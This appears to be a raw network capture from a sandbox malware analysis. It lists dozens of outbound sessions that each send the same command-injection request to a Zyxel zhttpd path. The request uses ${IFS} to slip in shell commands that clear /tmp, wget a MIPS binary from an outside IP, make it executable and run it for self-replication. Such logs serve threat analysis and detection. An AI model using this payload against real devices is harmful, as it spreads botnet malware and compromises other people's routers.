                                        Jan 14, 2024 16:19:02.876748085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9233192.168.2.1334024180.128.3.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876765013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9234192.168.2.136087261.133.18.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876827002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9235192.168.2.135923447.252.226.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876842022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9236192.168.2.1358396156.15.70.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876909018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9237192.168.2.1341902217.52.230.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876960993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9238192.168.2.134790861.253.113.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876987934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9239192.168.2.1360118182.185.54.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877027035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9240192.168.2.134329897.145.248.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877072096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9241192.168.2.1351398223.20.70.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877105951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9242192.168.2.135132090.139.189.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877159119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9243192.168.2.134086438.173.69.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877172947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9244192.168.2.1350638102.209.40.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877232075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9245192.168.2.13425669.169.181.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877255917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9246192.168.2.134358066.230.132.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877316952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9247192.168.2.1341926149.46.210.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877348900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9248192.168.2.1341938168.177.56.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877370119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9249192.168.2.1354670104.194.128.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877388954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9250192.168.2.1342090172.125.212.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877440929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9251192.168.2.134146857.159.145.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877477884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9252192.168.2.1348554179.123.42.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877507925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9253192.168.2.1335958169.22.213.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877566099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9254192.168.2.133497043.235.53.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877609968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9255192.168.2.134430480.142.1.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877646923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9256192.168.2.133766457.26.35.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877712011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9257192.168.2.1344880142.160.55.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877764940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9258192.168.2.1342238163.99.235.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877809048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9259192.168.2.1344588129.214.4.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877837896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9260192.168.2.134567881.202.105.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877871990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9261192.168.2.1334228173.202.66.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877912045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9262192.168.2.1346294135.158.151.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.877955914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9263192.168.2.135477285.8.211.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878036022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9264192.168.2.133504848.83.180.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878076077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9265192.168.2.1339420209.231.84.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878140926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9266192.168.2.133634067.236.143.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878184080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9267192.168.2.133321637.90.106.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878196001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9268192.168.2.135336052.149.88.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878216982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9269192.168.2.1340104124.240.152.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878246069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9270192.168.2.133524459.28.15.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878308058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9271192.168.2.135189842.29.67.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878377914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9272192.168.2.1332966119.255.234.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878377914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9273192.168.2.1355418111.168.82.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878410101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9274192.168.2.1358128204.191.107.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878457069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9275192.168.2.135128078.199.104.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878505945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9276192.168.2.1355116213.241.50.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878546953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9277192.168.2.1353810138.200.50.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878599882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9278192.168.2.134971854.234.204.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878634930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9279192.168.2.1352138154.144.52.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878664017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9280192.168.2.1357710217.152.187.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878715038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9281192.168.2.133955674.207.81.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878755093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9282192.168.2.1355164147.26.139.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878776073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9283192.168.2.135047080.255.169.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878818035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9284192.168.2.135629635.243.77.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878854036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9285192.168.2.134097414.136.216.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878895998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9286192.168.2.1350442218.45.231.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878935099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9287192.168.2.135237891.208.120.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.878972054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9288192.168.2.1338244131.89.217.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879000902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9289192.168.2.135476232.103.112.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879044056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9290192.168.2.1357520172.147.148.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879102945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9291192.168.2.133856297.190.23.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879129887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9292192.168.2.1341092104.90.215.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879178047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9293192.168.2.1358884201.243.100.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879184961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9294192.168.2.135254682.28.192.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879215956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9295192.168.2.133580898.86.66.34443
                                        TimestampBytes transferredDirectionData
